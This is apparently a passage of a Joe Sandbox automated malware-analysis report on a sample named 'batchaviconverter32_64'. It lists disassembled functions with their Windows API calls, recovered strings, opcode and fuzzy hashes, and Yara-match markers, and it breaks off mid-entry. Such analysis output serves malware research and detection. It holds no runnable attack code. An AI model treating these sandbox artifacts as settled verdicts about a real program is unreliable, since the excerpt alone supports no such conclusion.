                                                              • _memcmp.LIBCMT ref: 02D83141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressErrorLastString_memcmp
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 1618111833-2422070025
                                                              • Opcode ID: 0b6040506f2ecd65f950dbd49d44496c288e541548e77484067506b167b736b1
                                                              • Instruction ID: 860af0deb8a6ef422bc500f04f3e3884863d2a2c253737689012d55deb67ddca
                                                              • Opcode Fuzzy Hash: 0b6040506f2ecd65f950dbd49d44496c288e541548e77484067506b167b736b1
                                                              • Instruction Fuzzy Hash: 7031B175A003089FDF20AF64C880B7EB7A6EF45B25F1085A9E86D97380DB729D41CB91
                                                              Function 02D8CBE1 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8CBE6
                                                                • Part of subcall function 02D8D1C2: std::exception::exception.LIBCMT ref: 02D8D1F1
                                                                • Part of subcall function 02D8D978: __EH_prolog.LIBCMT ref: 02D8D97D
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                                • Part of subcall function 02D8D221: __EH_prolog.LIBCMT ref: 02D8D226
                                                              Strings
                                                              • P2t, xrefs: 02D8CC75, 02D8CC9D
                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D8CC1C
                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CC23
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$P2t$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                              • API String ID: 1953324306-826603865
                                                              • Opcode ID: 3ac2835462b181613b56ffd06ec99a0f762ffa174a7ce4897adba8b749851c5c
                                                              • Instruction ID: f2645b003b97db0a96619bd6065bb27a76281f63425c6e8540f7e23255a2a311
                                                              • Opcode Fuzzy Hash: 3ac2835462b181613b56ffd06ec99a0f762ffa174a7ce4897adba8b749851c5c
                                                              • Instruction Fuzzy Hash: 70216D71E05244DBDB14EFE8D964AEEBBB6EF54704F04405DE805A7390DB709E44CB61
                                                              Function 02D81F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D81F5B
                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D81FC5
                                                              • GetLastError.KERNEL32(?,00000000), ref: 02D81FD2
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$CompletionCreateErrorLastPort
                                                              • String ID: iocp
                                                              • API String ID: 998023749-976528080
                                                              • Opcode ID: 2dad324368abceeb1c7672cba7a139a49b0b8cbefc80cd3f4593a919cb8333a7
                                                              • Instruction ID: 0b80eeec56c4f2850c47fefab473c700e26c163920de16abdc68494bca8d6950
                                                              • Opcode Fuzzy Hash: 2dad324368abceeb1c7672cba7a139a49b0b8cbefc80cd3f4593a919cb8333a7
                                                              • Instruction Fuzzy Hash: BA21D8B18017449BC720DF6AD50055BFBF8FF94720B108A1FD49683B90D7B0AA04CF91
                                                              Function 02D93A7C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02D93A94
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • std::exception::exception.LIBCMT ref: 02D93AB2
                                                              • __CxxThrowException@8.LIBCMT ref: 02D93AC7
                                                                • Part of subcall function 02D9448A: RaiseException.KERNEL32(?,?,02D8FA91,?,?,?,?,?,?,?,02D8FA91,?,02DB0F88,?), ref: 02D944DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 3074076210-2104205924
                                                              • Opcode ID: 4a53fe06539fc47819c96f1f376529a9b7c930518bc7cab455263ff56c7e2eb0
                                                              • Instruction ID: 3640d77da0df004dcab725682f63fe03f9a8db7d648d1bfc19a5315a9950d6e7
                                                              • Opcode Fuzzy Hash: 4a53fe06539fc47819c96f1f376529a9b7c930518bc7cab455263ff56c7e2eb0
                                                              • Instruction Fuzzy Hash: A6E0A03050020EAADF00EAA0DC149AFB779EB01340F000196F814A1790DB70CE04D9E0
                                                              Function 02D837B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D837B6
                                                              • __localtime64.LIBCMT ref: 02D837C1
                                                                • Part of subcall function 02D92530: __gmtime64_s.LIBCMT ref: 02D92543
                                                              • std::exception::exception.LIBCMT ref: 02D837D9
                                                                • Part of subcall function 02D92403: std::exception::_Copy_str.LIBCMT ref: 02D9241C
                                                                • Part of subcall function 02D8A45A: __EH_prolog.LIBCMT ref: 02D8A45F
                                                                • Part of subcall function 02D8A45A: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A46E
                                                                • Part of subcall function 02D8A45A: __CxxThrowException@8.LIBCMT ref: 02D8A48D
                                                              Strings
                                                              • could not convert calendar time to UTC time, xrefs: 02D837CE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                              • String ID: could not convert calendar time to UTC time
                                                              • API String ID: 1963798777-2088861013
                                                              • Opcode ID: f792382161f6cb032275c57dfd67768cebee1408723b1ec7bb686cd4dc88514c
                                                              • Instruction ID: 8b0e29e52098a56c90030309e2ac723352d19212afb3a2a00122dadc08328e27
                                                              • Opcode Fuzzy Hash: f792382161f6cb032275c57dfd67768cebee1408723b1ec7bb686cd4dc88514c
                                                              • Instruction Fuzzy Hash: 93E06DB1D0120AABCF00EF94E828BAEB779EB04301F404599EC24A2740EB345E06CEA5
                                                              Function 00402685 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32 ref: 00402685
                                                              • GetCommandLineW.KERNEL32(?), ref: 0040B90F
                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 0040B916
                                                              Strings
                                                              • DKIM Authenticator lib 9.11.45, xrefs: 0040268B
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CommandLine$ArgvFileModuleName
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 722113969-992513482
                                                              • Opcode ID: 972b9c2e4087f6865a4fe1009c5827cae625d068c19bab819f2d61946da373ea
                                                              • Instruction ID: 763924a671eada478072756af9f095103c4065abeb9d3d9f0cb9dcfd3342fd83
                                                              • Opcode Fuzzy Hash: 972b9c2e4087f6865a4fe1009c5827cae625d068c19bab819f2d61946da373ea
                                                              • Instruction Fuzzy Hash: 24D0C272044509BBC20097A0AA4CA2E27E4E60E716331003BF103B51D1DA7C1550476E
                                                              Function 00403E3A Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 00404092
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
                                                              • HeapFree.KERNEL32(00000000,?), ref: 004040FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Free$Virtual$Heap
                                                              • String ID: -@
                                                              • API String ID: 2016334554-2999422947
                                                              • Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                              • Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
                                                              • Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                              • Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84
                                                              Function 02D9C319 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer_memmove
                                                              • String ID:
                                                              • API String ID: 1721217611-0
                                                              • Opcode ID: ed8d5b77d47f8358beeb194a57e3a1ae37186eb000ad157300fbdfc92325203c
                                                              • Instruction ID: d92b7fb3fd42b8c79eaed01ec31a4d5932e318eba2de824d9c4330549bc6fa72
                                                              • Opcode Fuzzy Hash: ed8d5b77d47f8358beeb194a57e3a1ae37186eb000ad157300fbdfc92325203c
                                                              • Instruction Fuzzy Hash: 4341B2363147029AEF285F64D860B7A33A6DF0A714F24401FF885863E1EB75ED90CA32
                                                              Function 02D91250 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D912EF
                                                                • Part of subcall function 02D83FDC: __EH_prolog.LIBCMT ref: 02D83FE1
                                                                • Part of subcall function 02D83FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D83FF3
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D912E4
                                                              • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91330
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91401
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$Event$CreateH_prolog
                                                              • String ID:
                                                              • API String ID: 2825413587-0
                                                              • Opcode ID: 88e6bbb9bdfcea3d63f7ded9d777af110faa18776323f12810986a88f0021c49
                                                              • Instruction ID: 7e86ed4d50ee2e82270204251153ae078e0105f35db6ce7080c1d28c0da5ea1f
                                                              • Opcode Fuzzy Hash: 88e6bbb9bdfcea3d63f7ded9d777af110faa18776323f12810986a88f0021c49
                                                              • Instruction Fuzzy Hash: EF517A716002468BDF21DF28C884B9AB7E4AF49328F194628F8ADA7390D735EC05CF95
                                                              Function 02D936DD Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: a8d32efa6cdd182728da25395dc61dfffc92a71ccbee65bad4900e2d45c96823
                                                              • Instruction ID: f8dec92a61fff42543cc10ed57fce759f0fa3215be4889579ec8c579c2ffbd93
                                                              • Opcode Fuzzy Hash: a8d32efa6cdd182728da25395dc61dfffc92a71ccbee65bad4900e2d45c96823
                                                              • Instruction Fuzzy Hash: 8B41BEB5B00606ABDFA88FA9C8905AEBBB6EF40364B1481BDF805C7384D772DD41CB50
                                                              Function 02D9FE45 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D9FE7B
                                                              • __isleadbyte_l.LIBCMT ref: 02D9FEA9
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02D9FED7
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02D9FF0D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 7fb807fdd9081f1fa4646c0ea3b128175883b936bcc8c7233e03a67d98411328
                                                              • Instruction ID: 30df72d73908d7cdf4ad5358cf8043bfc9cbe29a11334dabfcb0ceafdcf4b43d
                                                              • Opcode Fuzzy Hash: 7fb807fdd9081f1fa4646c0ea3b128175883b936bcc8c7233e03a67d98411328
                                                              • Instruction Fuzzy Hash: 1A318D3160024AAFEF21CF65C844BAA7BAAFF41314F154569F868C7691E731DC51CBA0
                                                              Function 004047B2 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,7591DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3,?,?), ref: 004047F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID: -@$r@$r@
                                                              • API String ID: 1263568516-1251997348
                                                              • Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                              • Instruction ID: a63ca1888fca441bf056fbcf5d5deb39584b298cc2094c54b415f4e68fc1e946
                                                              • Opcode Fuzzy Hash: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                              • Instruction Fuzzy Hash: EE21A1B66003419BDB20AB24DD4476633A4EB81379F24CA3BDB65B66D0D378E941CB58
                                                              Function 02D83D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • htons.WS2_32(?), ref: 02D83DA2
                                                                • Part of subcall function 02D83BD3: __EH_prolog.LIBCMT ref: 02D83BD8
                                                                • Part of subcall function 02D83BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                              • htonl.WS2_32(00000000), ref: 02D83DB9
                                                              • htonl.WS2_32(00000000), ref: 02D83DC0
                                                              • htons.WS2_32(?), ref: 02D83DD4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                              • String ID:
                                                              • API String ID: 3882411702-0
                                                              • Opcode ID: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                              • Instruction ID: 344b09f7ac92c841658670af48fd2214ac5eb1e26639ae0a9658c9bc6ad11d7e
                                                              • Opcode Fuzzy Hash: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                              • Instruction Fuzzy Hash: DA117C75A00209EBDF01AF64D885EAAB7B9EF09710F008496FD08DF305E6719E14CBA1
                                                              Function 02D8239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D823D0
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D823DE
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82401
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82408
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 4018804020-0
                                                              • Opcode ID: 6649864b52e9b093aeb7dd8013284c28ad55140bc11482fc6cf5bb3c9fea6e9e
                                                              • Instruction ID: f7cde088385448701f84d431b7cd91fec310889a190644a1c9215e21562a1d13
                                                              • Opcode Fuzzy Hash: 6649864b52e9b093aeb7dd8013284c28ad55140bc11482fc6cf5bb3c9fea6e9e
                                                              • Instruction Fuzzy Hash: 96118E71600205ABEB10AF65D989F6ABBB9FF54705F20446DE9019B240E7B1ED51CBA0
                                                              Function 02D82EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82EEE
                                                              • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82EFD
                                                              • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82F0C
                                                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D82F36
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Socketsetsockopt
                                                              • String ID:
                                                              • API String ID: 2093263913-0
                                                              • Opcode ID: f3580a45de6c6fc9e317be4cd35a34126ff54a7eb72a268560dedb9bb46eabc5
                                                              • Instruction ID: ce62a50c1f469cf462a3fdde62d8ac445c31b4187a5eae90c7edbf8f8ba60834
                                                              • Opcode Fuzzy Hash: f3580a45de6c6fc9e317be4cd35a34126ff54a7eb72a268560dedb9bb46eabc5
                                                              • Instruction Fuzzy Hash: F9017575940204BBDB205F66DC48F9ABBA9EB89761F008565F9089B281D7708D00CBB1
                                                              Function 02D9C76B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: 90c5734dd1d3332497403f757fabdb775d88ef764105b7d0e35aa8a2cca3e1ba
                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction Fuzzy Hash: 9C014B7606014ABBCF126E84CC418EE3F67BB0D354F488416FA1899230E737C9B1EB91
                                                              Function 02D8247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D824A9
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D824B8
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D824CD
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D824D4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 4018804020-0
                                                              • Opcode ID: 286c41a72aee33c908066edb53255fa1173566d215622ef84599f817285bce71
                                                              • Instruction ID: bf068226e98e22695b5c3bffdcc5bfb61be724af8160581231d8a643b1cf1203
                                                              • Opcode Fuzzy Hash: 286c41a72aee33c908066edb53255fa1173566d215622ef84599f817285bce71
                                                              • Instruction Fuzzy Hash: 7DF03C72540205AFEB00EFA9E849F9ABBBCFF44711F108419FA05C6241D771E960CFA4
                                                              Function 02D82004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D82009
                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 02D82028
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D82037
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D8204E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                              • String ID:
                                                              • API String ID: 2456309408-0
                                                              • Opcode ID: 0f833d0cacea8466ddedc41491d18aa834be8201d27dde4c99f3fef94eb35e0b
                                                              • Instruction ID: 5efb91fcf6e11d223f91c8fca6c53b43b0731c6df62a7933cb862e5d43c21a6e
                                                              • Opcode Fuzzy Hash: 0f833d0cacea8466ddedc41491d18aa834be8201d27dde4c99f3fef94eb35e0b
                                                              • Instruction Fuzzy Hash: FE0169719006449BD728AF54E908BAAFBB5FF04704F20495EE84692BA0CBB46D48CF69
                                                              Function 02D81E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$H_prologSleep
                                                              • String ID:
                                                              • API String ID: 1765829285-0
                                                              • Opcode ID: a0156326695614888bf16bae32458a56aa83a377e61b3c1dda98bbd7198d7e67
                                                              • Instruction ID: 201132100f51793ef996c34dd50acf7bbe236cd6cbd8894ea641a098337a240b
                                                              • Opcode Fuzzy Hash: a0156326695614888bf16bae32458a56aa83a377e61b3c1dda98bbd7198d7e67
                                                              • Instruction Fuzzy Hash: B4F09A32A40510EFDB009FA4E889F8DBBB0FF08321F1081A8FA0A8B390C7359C40CB65
                                                              Function 0040475C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 27memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,r@,0040485C,r@,7591DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3), ref: 0040476B
                                                              • HeapFree.KERNEL32(00000000,?), ref: 004047A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Free$HeapVirtual
                                                              • String ID: r@$r@
                                                              • API String ID: 3783212868-1712950306
                                                              • Opcode ID: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                              • Instruction ID: 9f28707f468f96f8ba01f1c404cbd9d3f6c084a3717c71e7c0065962692db169
                                                              • Opcode Fuzzy Hash: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                              • Instruction Fuzzy Hash: C6F01774544210DFC3248F08EE08A427BA0FB88720B11867EF996672E1C371AC50CF88
                                                              Function 02D89E87 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmove
                                                              • String ID: &'
                                                              • API String ID: 3529519853-655172784
                                                              • Opcode ID: fe8097e77034f966722bd6cf4c8b067939e6c1578abbbbcd8db11f0118bf52a5
                                                              • Instruction ID: 8fdf3b5e19ae643d68de024bc502a51d56cdebd4d5f59b0aa1d7335d81087c97
                                                              • Opcode Fuzzy Hash: fe8097e77034f966722bd6cf4c8b067939e6c1578abbbbcd8db11f0118bf52a5
                                                              • Instruction Fuzzy Hash: 23617C71D002199BDF25EFA4C990BEEBBB6EF48310F10816AE445AB380D7709E45CFA1
                                                              Function 00404EBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID: $
                                                              • API String ID: 1807457897-3032137957
                                                              • Opcode ID: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                              • Instruction ID: e64d793a5bd47a750bf71bc710b27f1b951018593c94bf49e3c2bba34da37a12
